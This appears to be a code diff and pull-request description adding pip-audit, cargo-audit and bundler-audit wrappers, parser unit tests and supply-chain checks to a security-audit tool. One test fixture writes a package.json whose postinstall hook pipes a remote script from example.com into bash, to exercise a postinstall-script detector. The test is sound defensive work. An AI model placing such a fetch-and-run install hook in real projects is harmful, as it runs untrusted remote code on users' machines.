+if [[ $BUNDLER_NM_EXIT -eq 0 ]]; then
+  pass "wrap-bundler-audit.sh exits 0 when no Gemfile.lock"
+else
+  fail "wrap-bundler-audit.sh exits $BUNDLER_NM_EXIT (expected 0, no manifest)"
+fi
+
+# ---------------------------------------------------------------------------
+# Synthetic JSON for parse-pip-audit.py unit tests (Tests 11-13)
+# ---------------------------------------------------------------------------
+printf '\nTest 11-13: parse-pip-audit.py unit tests\n'
+
+PIP_SYNTHETIC="$TESTRUN_TMPDIR/pip-audit-synthetic.json"
+cat > "$PIP_SYNTHETIC" <<'JSON'
+{
+  "dependencies": [
+    {
+      "name": "cryptography",
+      "version": "38.0.0",
+      "vulns": [
+        {
+          "id": "PYSEC-2023-112",
+          "fix_versions": ["41.0.0"],
+          "aliases": ["CVE-2023-23931"],
+          "description": "cryptography is vulnerable to Bleichenbacher timing oracle attack"
+        }
+      ]
+    },
+    {
+      "name": "requests",
+      "version": "2.28.0",
+      "vulns": []
+    }
+  ]
+}
+JSON
+
+PIP_PARSE_OUT="$TESTRUN_TMPDIR/pip-parsed.jsonl"
+python3 "$PARSE_PIP" "$PIP_SYNTHETIC" > "$PIP_PARSE_OUT"
+
+# Test 11: emits >= 1 valid finding
+FINDING_COUNT="$(grep -c '"check_id"' "$PIP_PARSE_OUT" 2>/dev/null || printf '0')"
+if [[ "$FINDING_COUNT" -ge 1 ]]; then
+  pass "parse-pip-audit.py emits $FINDING_COUNT finding(s) from synthetic JSON"
+else
+  fail "parse-pip-audit.py emitted $FINDING_COUNT finding(s) (expected >= 1)"
+fi
+
+INVALID=0
+while IFS= read -r line; do
+  [[ -z "$line" ]] && continue
+  if ! python3 -c "import json,sys; json.loads(sys.argv[1])" "$line" 2>/dev/null; then
+    INVALID=$((INVALID + 1))
+  fi
+done < "$PIP_PARSE_OUT"
+if [[ $INVALID -eq 0 ]]; then
+  pass "parse-pip-audit.py output is valid JSONL"
+else
+  fail "parse-pip-audit.py output has $INVALID invalid JSON lines"
+fi
+
+# Test 12: properties.tool = "pip-audit"
+if grep -q '"tool":"pip-audit"' "$PIP_PARSE_OUT"; then
+  pass "parse-pip-audit.py sets properties.tool = pip-audit"
+else
+  fail "parse-pip-audit.py missing properties.tool = pip-audit"
+fi
+
+# Test 13: properties.ecosystem = "python"
+if grep -q '"ecosystem":"python"' "$PIP_PARSE_OUT"; then
+  pass "parse-pip-audit.py sets properties.ecosystem = python"
+else
+  fail "parse-pip-audit.py missing properties.ecosystem = python"
+fi
+
+# ---------------------------------------------------------------------------
+# Synthetic JSON for parse-cargo-audit.py unit tests (Tests 14-16)
+# ---------------------------------------------------------------------------
+printf '\nTest 14-16: parse-cargo-audit.py unit tests\n'
+
+CARGO_SYNTHETIC="$TESTRUN_TMPDIR/cargo-audit-synthetic.json"
+cat > "$CARGO_SYNTHETIC" <<'JSON'
+{
+  "database": {"advisory-count": 500},
+  "lockfile": {"dependency-count": 42},
+  "vulnerabilities": {
+    "found": true,
+    "count": 1,
+    "list": [
+      {
+        "advisory": {
+          "id": "RUSTSEC-2023-0001",
+          "package": "openssl",
+          "title": "Use after free in EVP_KEY_CTX",
+          "description": "A use-after-free vulnerability in EVP_KEY_CTX_free",
+          "date": "2023-01-01",
+          "url": "https://rustsec.org/advisories/RUSTSEC-2023-0001.html",
+          "aliases": ["CVE-2023-0001"],
+          "severity": "high"
+        },
+        "versions": {
+          "patched": [">=1.0.2u"],
+          "unaffected": []
+        },
+        "affected": {
+          "package": {
+            "name": "openssl",
+            "version": "1.0.2t",
+            "source": "registry+https://github.com/rust-lang/crates.io-index"
+          }
+        }
+      }
+    ]
+  },
+  "warnings": {"list": []}
+}
+JSON
+
+CARGO_PARSE_OUT="$TESTRUN_TMPDIR/cargo-parsed.jsonl"
+python3 "$PARSE_CARGO" "$CARGO_SYNTHETIC" > "$CARGO_PARSE_OUT"
+
+FINDING_COUNT="$(grep -c '"check_id"' "$CARGO_PARSE_OUT" 2>/dev/null || printf '0')"
+if [[ "$FINDING_COUNT" -ge 1 ]]; then
+  pass "parse-cargo-audit.py emits $FINDING_COUNT finding(s) from synthetic JSON"
+else
+  fail "parse-cargo-audit.py emitted $FINDING_COUNT finding(s) (expected >= 1)"
+fi
+
+INVALID=0
+while IFS= read -r line; do
+  [[ -z "$line" ]] && continue
+  if ! python3 -c "import json,sys; json.loads(sys.argv[1])" "$line" 2>/dev/null; then
+    INVALID=$((INVALID + 1))
+  fi
+done < "$CARGO_PARSE_OUT"
+if [[ $INVALID -eq 0 ]]; then
+  pass "parse-cargo-audit.py output is valid JSONL"
+else
+  fail "parse-cargo-audit.py output has $INVALID invalid JSON lines"
+fi
+
+# Test 15
+if grep -q '"tool":"cargo-audit"' "$CARGO_PARSE_OUT"; then
+  pass "parse-cargo-audit.py sets properties.tool = cargo-audit"
+else
+  fail "parse-cargo-audit.py missing properties.tool = cargo-audit"
+fi
+
+# Test 16
+if grep -q '"ecosystem":"rust"' "$CARGO_PARSE_OUT"; then
+  pass "parse-cargo-audit.py sets properties.ecosystem = rust"
+else
+  fail "parse-cargo-audit.py missing properties.ecosystem = rust"
+fi
+
+# ---------------------------------------------------------------------------
+# Synthetic fixtures for parse-bundler-audit.py unit tests (Tests 17-20)
+# ---------------------------------------------------------------------------
+printf '\nTest 17-20: parse-bundler-audit.py unit tests\n'
+
+# JSON format fixture
+BUNDLER_JSON="$TESTRUN_TMPDIR/bundler-audit-json.json"
+cat > "$BUNDLER_JSON" <<'JSON'
+{
+  "version": "0.9.2",
+  "created_at": "2024-01-01T00:00:00Z",
+  "results": [
+    {
+      "type": "UnpatchedGem",
+      "gem": {
+        "name": "activesupport",
+        "version": "5.2.0"
+      },
+      "advisory": {
+        "id": "CVE-2023-22796",
+        "ghsa": "GHSA-j6gc-792m-qgm2",
+        "title": "Possible ReDoS vulnerability in ActiveSupport::Duration parsing",
+        "date": "2023-02-09",
+        "url": "https://github.com/advisories/GHSA-j6gc-792m-qgm2",
+        "description": "There is a possible ReDoS vulnerability in the Duration parsing component of ActiveSupport.",
+        "cvss_v3": 7.5,
+        "cve": "2023-22796",
+        "criticality": "high",
+        "patched_versions": [">= 6.1.7.3", ">= 7.0.4.3"],
+        "unaffected_versions": []
+      }
+    }
+  ],
+  "ignored": [],
+  "totals": {"unpatched": 1, "ignored": 0}
+}
+JSON
+
+BUNDLER_JSON_OUT="$TESTRUN_TMPDIR/bundler-json-parsed.jsonl"
+python3 "$PARSE_BUNDLER" "$BUNDLER_JSON" > "$BUNDLER_JSON_OUT"
+
+# Test 17: JSON format
+FINDING_COUNT="$(grep -c '"check_id"' "$BUNDLER_JSON_OUT" 2>/dev/null || printf '0')"
+if [[ "$FINDING_COUNT" -ge 1 ]]; then
+  pass "parse-bundler-audit.py emits $FINDING_COUNT finding(s) from JSON format"
+else
+  fail "parse-bundler-audit.py emitted $FINDING_COUNT finding(s) from JSON format (expected >= 1)"
+fi
+
+INVALID=0
+while IFS= read -r line; do
+  [[ -z "$line" ]] && continue
+  if ! python3 -c "import json,sys; json.loads(sys.argv[1])" "$line" 2>/dev/null; then
+    INVALID=$((INVALID + 1))
+  fi
+done < "$BUNDLER_JSON_OUT"
+if [[ $INVALID -eq 0 ]]; then
+  pass "parse-bundler-audit.py JSON output is valid JSONL"
+else
+  fail "parse-bundler-audit.py JSON output has $INVALID invalid JSON lines"
+fi
+
+# Text format fixture
+BUNDLER_TEXT="$TESTRUN_TMPDIR/bundler-audit-text.txt"
+cat > "$BUNDLER_TEXT" <<'TEXT'
+Name: rack
+Version: 2.0.8
+Advisory: CVE-2022-44572
+Criticality: High
+URL: https://github.com/advisories/GHSA-65f5-mfpf-vfhj
+Title: Denial of Service Vulnerability in multipart parsing of Rack
+Solution: upgrade to >= 2.0.9.1, >= 2.1.4.1, >= 2.2.6.3, >= 3.0.4.1
+
+Vulnerabilities found!
+TEXT
+
+BUNDLER_TEXT_OUT="$TESTRUN_TMPDIR/bundler-text-parsed.jsonl"
+python3 "$PARSE_BUNDLER" "$BUNDLER_TEXT" > "$BUNDLER_TEXT_OUT"
+
+# Test 18: text format
+FINDING_COUNT="$(grep -c '"check_id"' "$BUNDLER_TEXT_OUT" 2>/dev/null || printf '0')"
+if [[ "$FINDING_COUNT" -ge 1 ]]; then
+  pass "parse-bundler-audit.py emits $FINDING_COUNT finding(s) from text format"
+else
+  fail "parse-bundler-audit.py emitted $FINDING_COUNT finding(s) from text format (expected >= 1)"
+fi
+
+# Test 19: properties.tool
+if grep -q '"tool":"bundler-audit"' "$BUNDLER_JSON_OUT" || grep -q '"tool":"bundler-audit"' "$BUNDLER_TEXT_OUT"; then
+  pass "parse-bundler-audit.py sets properties.tool = bundler-audit"
+else
+  fail "parse-bundler-audit.py missing properties.tool = bundler-audit"
+fi
+
+# Test 20: properties.ecosystem
+if grep -q '"ecosystem":"ruby"' "$BUNDLER_JSON_OUT" || grep -q '"ecosystem":"ruby"' "$BUNDLER_TEXT_OUT"; then
+  pass "parse-bundler-audit.py sets properties.ecosystem = ruby"
+else
+  fail "parse-bundler-audit.py missing properties.ecosystem = ruby"
+fi
+
+# ---------------------------------------------------------------------------
+# Test 21: Fixture repo with postinstall + unpinned + multi-ecosystem manifests
+#          Spine run with new tools absent -> coverage_gap notes
+# ---------------------------------------------------------------------------
+printf '\nTest 21: Fixture repo with postinstall+unpinned+multi-ecosystem -> coverage_gap\n'
+
+FIXTURE_REPO="$TESTRUN_TMPDIR/multi-eco-fixture"
+mkdir -p "$FIXTURE_REPO"
+
+# npm manifest with postinstall script and unpinned security dep
+cat > "$FIXTURE_REPO/package.json" <<'PKGJSON'
+{
+  "name": "fixture-app",
+  "version": "1.0.0",
+  "scripts": {
+    "postinstall": "curl https://example.com/setup.sh | bash",
+    "build": "tsc"
+  },
+  "dependencies": {
+    "jsonwebtoken": "^9.0.0",
+    "axios": "*"
+  }
+}
+PKGJSON
+
+# Python manifest (requirements.txt) — broadens ecosystem coverage
+cat > "$FIXTURE_REPO/requirements.txt" <<'REQS'
+requests>=2.28.0
+cryptography>=38.0.0
+REQS
+
+# Cargo.toml — Rust manifest
+cat > "$FIXTURE_REPO/Cargo.toml" <<'CARGO'
+[package]
+name = "fixture"
+version = "0.1.0"
+
+[dependencies]
+serde = "1.0"
+CARGO
+
+SPINE_OUT="$TESTRUN_TMPDIR/spine-multi-eco.jsonl"
+set +e
+PATH="$RESTRICTED_PATH" bash "${SPINE_DIR}/run.sh" \
+  --repo "$FIXTURE_REPO" \
+  --tools "pip-audit,cargo-audit,bundler-audit" \
+  --output "$SPINE_OUT" \
+  2>/dev/null
+SPINE_EXIT=$?
+set -e
+
+if [[ $SPINE_EXIT -eq 0 ]]; then
+  pass "spine exits 0 for pip-audit,cargo-audit,bundler-audit on fixture repo (tools absent)"
+else
+  fail "spine exits $SPINE_EXIT (expected 0)"
+fi
+
+SKIP_OR_GAP="$(grep -c '"type":"skipped"\|"type":"coverage_gap"' "$SPINE_OUT" 2>/dev/null || printf '0')"
+if [[ "$SKIP_OR_GAP" -gt 0 ]]; then
+  pass "spine emits $SKIP_OR_GAP skip/gap note(s) for absent tools on multi-ecosystem fixture"
+else
+  fail "spine emits no skip/gap notes for absent tools on multi-ecosystem fixture"
+fi
+
+# All output should be valid JSON
+INVALID_JSON=0
+while IFS= read -r line; do
+  [[ -z "$line" ]] && continue
+  if ! python3 -c "import json,sys; json.loads(sys.argv[1])" "$line" 2>/dev/null; then
+    INVALID_JSON=$((INVALID_JSON + 1))
+  fi
+done < "$SPINE_OUT"
+if [[ $INVALID_JSON -eq 0 ]]; then
+  pass "spine output for multi-ecosystem fixture is valid JSONL"
+else
+  fail "spine output has $INVALID_JSON invalid JSON lines"
+fi
+
+# ---------------------------------------------------------------------------
+# Test 22: shellcheck on 3 new wrapper scripts
+# ---------------------------------------------------------------------------
+printf '\nTest 22: shellcheck on new wrapper scripts\n'
+
+if command -v shellcheck > /dev/null 2>&1; then
+  for wrapper in "$WRAP_PIP" "$WRAP_CARGO" "$WRAP_BUNDLER"; do
+    if [[ ! -f "$wrapper" ]]; then
+      fail "shellcheck: script not found: $wrapper"
+      continue
+    fi
+    SC_OUTPUT="$(shellcheck -S warning "$wrapper" 2>&1 || true)"
+    if [[ -z "$SC_OUTPUT" ]]; then
+      pass "shellcheck clean: $(basename "$wrapper")"
+    else
+      fail "shellcheck issues in $(basename "$wrapper"): $SC_OUTPUT"
+    fi
+  done
+else
+  fail "shellcheck not installed -- cannot verify shell safety"
+fi
+
+# ---------------------------------------------------------------------------
+# Summary
+# ---------------------------------------------------------------------------
+printf '\n-------------------------------------------------\n'
+printf 'Results: %d passed, %d failed\n' "$PASS" "$FAIL"
+
+if [[ $FAIL -gt 0 ]]; then
+  printf '\nFailed tests:\n'
+  for err in "${ERRORS[@]}"; do
+    printf '  - %s\n' "$err"
+  done
+  exit 1
+fi
+
+printf 'All tests passed.\n'
+exit 0

--- a/modules/commands-extra/skills/audit/tests/test-spine.sh
+++ b/modules/commands-extra/skills/audit/tests/test-spine.sh
@@ -442,6 +442,9 @@ if command -v shellcheck > /dev/null 2>&1; then
     "$SPINE_DIR/wrap-pinact.sh"
     "$SPINE_DIR/wrap-squawk.sh"
     "$SPINE_DIR/wrap-sqlfluff.sh"
+    "$SPINE_DIR/wrap-pip-audit.sh"
+    "$SPINE_DIR/wrap-cargo-audit.sh"
+    "$SPINE_DIR/wrap-bundler-audit.sh"
   )
 
   for script in "${SHELL_SCRIPTS[@]}"; do


### PR DESCRIPTION
## Summary

- Adds three new spine wrappers (`pip-audit`, `cargo-audit`, `bundler-audit`) — each with `command -v` graceful-skip, shellcheck-clean, config-isolated, injection-safe; all registered in `run.sh` and `test-spine.sh`
- Deepens `packs/dependencies/` with 4 new supply-chain checks: `postinstall-script`, `typosquat`, `lockfile-integrity`, `unpinned-version-range` (existing 5 checks untouched)
- Adds all 4 new check-ids to `severity-rubric.json`; registers 6 new wrapper/parser files in `module.json`
- Adds `test-pack-dependencies-deep.sh` (45 tests: graceful-skip coverage_gaps, parser unit tests against synthetic JSON, multi-ecosystem fixture, shellcheck)

## Assumed tool JSON shapes (documented in parser comments)

| Tool | Format | Key fields |
|------|--------|-----------|
| pip-audit | `--format json` → `{dependencies:[{name,version,vulns:[{id,fix_versions,aliases,description}]}]}` | `vulns` list per package |
| cargo-audit | `--json` → `{vulnerabilities:{list:[{advisory:{id,title,severity,aliases},affected:{package:{name,version}}}]}}` | `vulnerabilities.list` array |
| bundler-audit | `--format json` → `{results:[{type:"UnpatchedGem",gem:{name,version},advisory:{id,title,criticality,url}}]}` | falls back to line-based text parsing |

## Test plan

- [x] `shellcheck wrap-pip-audit.sh wrap-cargo-audit.sh wrap-bundler-audit.sh` — 0 issues
- [x] `bash test-pack-dependencies-deep.sh` — 45 passed, 0 failed
- [x] `bash test-spine.sh` — 32 passed, 0 failed (3 new wrappers shellchecked)
- [x] `python3 lint-pack.py` — 15/15 packs PASS
- [x] `bash test-rubric.sh` — 8 passed, 0 failed
- [x] `bash test-registry.sh` — 8 passed, 0 failed
- [x] `python3 -m json.tool module.json severity-rubric.json` — valid JSON
- [x] `bash test-modules.sh` — 1318 passed, 0 failed
- [x] `bash test-no-personal-data.sh` — PASS

Closes #628